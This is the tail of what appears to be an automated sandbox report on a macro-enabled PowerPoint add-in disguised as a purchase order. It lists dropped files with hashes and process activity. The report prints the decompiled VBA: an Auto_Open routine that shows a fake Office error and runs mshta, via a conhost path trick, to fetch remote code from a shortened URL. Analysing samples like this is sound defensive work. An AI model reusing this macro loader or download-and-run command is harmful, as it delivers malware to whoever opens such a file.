                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):140624
                                                                                                                                      Entropy (8bit):5.356684130985417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:TcQIfgxrBdA3guwtnQ9DQW+zUk4F77nXmvid1XPE6LWmE9:J5Q9DQW+zAX8H
                                                                                                                                      MD5:D8CDAF1546CD90C88BA9E735B923B8DC
                                                                                                                                      SHA1:9FF228A971525D88966002BBF98F347CCAB97D22
                                                                                                                                      SHA-256:66D78647A9BBE3A8E2F95C4C905AE2AC144987681DE0C361B06F8F8D75FD9005
                                                                                                                                      SHA-512:962A376D092587EA321FDAD3908B7623421AC65857562929C704436F8273771FC499544ECBE14ECA94C13954682AE1E18B2DDBBD899EA7DEB176012B76EE8AC2
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-01-05T15:12:47">.. Build: 16.0.14812.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF7C77FA3DFFBB1450.TMP
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):36864
                                                                                                                                      Entropy (8bit):1.7887517421398942
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:DkxIFJTl7hTCC2ftTpjyvQzrIlyphc7nSO/e3mkgmb1vE+X9wh4jMpibo:DphTCJ1mvQzVc7+mf2/6hwM
                                                                                                                                      MD5:E458972D9E5783ED2F8E1B029034C27F
                                                                                                                                      SHA1:D0567BD9ACCA0CBF77C6ED154BAABF8521B5DE47
                                                                                                                                      SHA-256:9BAB0F56BC67863E246021539E37F5D08DEBF1DFFE59368629D7FA18A0C43E68
                                                                                                                                      SHA-512:44A73E97BB6C2478B3AC4C56477627643ABB01A8C6923A455145FF32B46289DC420BF9E2F91667E54FCEF3478C816FEF243632F833346EB7501BE1967B47091B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFC4F56B0AF15685FD.TMP
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12800
                                                                                                                                      Entropy (8bit):4.4428778819888874
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:Ws8wUeMoAMpiab1vJc+X9wh4xyphc7nSO/e3mkgCmol7hTCC2ftTpjyvQzrI/kxc:WsXsMjJ36hlc7+mf5ophTCJ1mvQz
                                                                                                                                      MD5:F6EE3FB1D6F7A34831A10CC6042F482D
                                                                                                                                      SHA1:E6DAF7B6CCB8A8FD79FB8436EDD6781E737B9336
                                                                                                                                      SHA-256:9DE1077524DC33850207804AC0E453A7EE202ECE8B73694DD58A3A2314F480AC
                                                                                                                                      SHA-512:553205CA0F10BAC73CB6DDC503225AA65226F7B13D77556E0D82EEED48AEDD6E7D69ABA86D2FBC131D945A4CA83F129EB67596C593C8114F76AEA0B941EC9981
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO04012022.LNK
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:24:15 2020, mtime=Wed Jan 5 23:13:04 2022, atime=Wed Jan 5 23:12:44 2022, length=8315, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1076
                                                                                                                                      Entropy (8bit):4.679717367572163
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:8AcvUteCHqDGckwgkXeDckhPX+WLoHX01I9RcAjAsg/mlDR8ldA9oDd5v5uv5L4Q:8AqWPPbo301sAsgelO/DGw7aB6m
                                                                                                                                      MD5:BFC92E876D4C38249AE0F1EB0BBA520A
                                                                                                                                      SHA1:659FABA344AE3506CE47206E8F875348E25CD373
                                                                                                                                      SHA-256:A6288775F0CB98D519AC56C100F16081312F808C87DD0FEE840B66BD98E94E87
                                                                                                                                      SHA-512:8BEDDEFD3E0B2BE4EFDCB090015F4D8FE9363B2ABC0F138957BFC9A3313F2B10D6AFC6F854C258B1D5C66E75058D6ECC0EEB254653C070EC9D0BDFD9EF75B030
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: L..................F.... .......=....G^,....U.. ....{ ...........................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L..&T......................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N..&T.......S.....................N..f.r.o.n.t.d.e.s.k.....~.1.....>Q.{..Desktop.h.......N..&T.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.{ ..&T.. .PO0401~1.PPA..P......>Q.{&T......WA........................P.O.0.4.0.1.2.0.2.2...p.p.a.m.......Y...............-.......X...........>.S......C:\Users\user\Desktop\PO04012022.ppam..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.0.4.0.1.2.0.2.2...p.p.a.m.........:..,.LB.)...A....`.......X.......061544...........!a..%.H.VZAj....Y..0............!a..%.H.VZAj....Y..0.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):55
                                                                                                                                      Entropy (8bit):4.335727440718713
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:H+e+X+m4Y7+X+v:HZ+x7+A
                                                                                                                                      MD5:2D4D2EBF899746AEE74C9E836BE85404
                                                                                                                                      SHA1:FF017E29B562F11835EB502231B8E3ACE0811FA2
                                                                                                                                      SHA-256:A109B4915699D93E46CEF6F49FD1613352AE6BEE93F812899DA3EEF378B81DFD
                                                                                                                                      SHA-512:AA2C0A79253D3A67A2E223460E2FAB8346B7768381ACE093672F549F5E5070B53518FA84D68C042A8BE1B324252804AFBABD6C0B0855B146C9AECBB3F134DCAD
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: [misc]..PO04012022.LNK=0..[folders]..PO04012022.LNK=0..
                                                                                                                                      C:\Users\user\Desktop\~$PO04012022.ppam
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):165
                                                                                                                                      Entropy (8bit):1.6126637592865871
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Rl/FS6dtt:RtF51
                                                                                                                                      MD5:51F16C7DB8702926DCC71B93EE3AD91C
                                                                                                                                      SHA1:924D0EF900F88314B241B57514C98F52C2B5C005
                                                                                                                                      SHA-256:3B8E674E31B17B169A1C2D5824C1CE02E537E35C44D2F92BC2A34E01E7B22396
                                                                                                                                      SHA-512:A4659C31D563D38CA0E8BC309D88C6C8463E0D8C2DED867AD27F2CD618F4C76960C6E86DF7108DE2EA1D771411B3EC7738E11E987FB108763E2B93EA16211AA8
                                                                                                                                      Malicious:true
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview: .pratesh. ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Microsoft PowerPoint 2007+
                                                                                                                                      Entropy (8bit):7.633099793344531
                                                                                                                                      TrID:
                                                                                                                                      • Microsoft PowerPoint Macro-enabled Open XML add-in (32504/1) 80.25%
                                                                                                                                      • ZIP compressed archive (8000/1) 19.75%
                                                                                                                                      File name:PO04012022.ppam
                                                                                                                                      File size:8801
                                                                                                                                      MD5:d58141c856b4831f0c7deb594c4fd25b
                                                                                                                                      SHA1:87ab8351719c70bc5f611d736e32a8a19fce8a2f
                                                                                                                                      SHA256:a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505
                                                                                                                                      SHA512:0b739f25e56fa13d8db7f25e883cbfd0e8d2470adc3c0de45049da8530eec15c4e1627930534bd6356f162f9d7ce2c70c3ea0256805d6eb6ed31f180cda5a1a9
                                                                                                                                      SSDEEP:192:sz8PvSFUzffz6qQaQzGbjeaS1UujK2ho/Erp/Z2i7H:sz8PvQULzCKKQQMEr1t
                                                                                                                                      File Content Preview:PK..........#T^.......U.......[Content_Types].xml...N.0...H.C...dp@......&1..M.6.:Q....I....Ti........r.wb....\....H.U..\.o..{)".U.9.\.1.eq}...=F...s.2....i....GJ....8.C.=.OhP...w.8b$.x.!......X.v.......H.F...;k.SQ.T.>f...A5......K.o..]...7pv........8K...

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:80b6b2d6d6d2d2ce

                                                                                                                                      Network Behavior

                                                                                                                                      No network behavior found

                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Start time:16:12:44
                                                                                                                                      Start date:05/01/2022
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
                                                                                                                                      Imagebase:0x280000
                                                                                                                                      File size:1849008 bytes
                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:16:12:59
                                                                                                                                      Start date:05/01/2022
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam"
                                                                                                                                      Imagebase:0x870000
                                                                                                                                      File size:232960 bytes
                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:16:12:59
                                                                                                                                      Start date:05/01/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff774ee0000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:16:13:00
                                                                                                                                      Start date:05/01/2022
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam" /ou "
                                                                                                                                      Imagebase:0x280000
                                                                                                                                      File size:1849008 bytes
                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Call Graph

                                                                                                                                      Graph

                                                                                                                                      • Entrypoint
                                                                                                                                      • Decryption Function
                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Show Help
                                                                                                                                      callgraph 9 lol 22 Auto_Open 22->9

                                                                                                                                      Module: Class1

                                                                                                                                      Declaration
                                                                                                                                      LineContent
                                                                                                                                      1

                                                                                                                                      Attribute VB_Name = "Class1"

                                                                                                                                      2

                                                                                                                                      Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

                                                                                                                                      3

                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                      4

                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                      5

                                                                                                                                      Attribute VB_PredeclaredId = False

                                                                                                                                      6

                                                                                                                                      Attribute VB_Exposed = False

                                                                                                                                      7

                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                      8

                                                                                                                                      Attribute VB_Customizable = False

                                                                                                                                      Executed Functions
                                                                                                                                      APIsMeta Information

                                                                                                                                      Assert

                                                                                                                                      Shell

                                                                                                                                      Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd")
                                                                                                                                      StringsDecrypted Strings
                                                                                                                                      "c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"
                                                                                                                                      LineInstructionMeta Information
                                                                                                                                      9

                                                                                                                                      Public Function lol()

                                                                                                                                      10

                                                                                                                                      Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd"))

                                                                                                                                      Assert

                                                                                                                                      Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd")

                                                                                                                                      executed
                                                                                                                                      11

                                                                                                                                      End Function

                                                                                                                                      Module: Module11

                                                                                                                                      Declaration
                                                                                                                                      LineContent
                                                                                                                                      1

                                                                                                                                      Attribute VB_Name = "Module11"

                                                                                                                                      Executed Functions
                                                                                                                                      APIsMeta Information

                                                                                                                                      Part of subcall function lol@Class1: Assert

                                                                                                                                      Part of subcall function lol@Class1: Shell

                                                                                                                                      LineInstructionMeta Information
                                                                                                                                      2

                                                                                                                                      Sub Auto_Open()

                                                                                                                                      3

                                                                                                                                      Dim obj as New Class1

                                                                                                                                      executed
                                                                                                                                      4

                                                                                                                                      Debug.Print MsgBox("ERROR!Re-Install Office", vbOKCancel); returns; 1 ' BAD !

                                                                                                                                      5

                                                                                                                                      obj.lol

                                                                                                                                      6

                                                                                                                                      End Sub

                                                                                                                                      Reset < >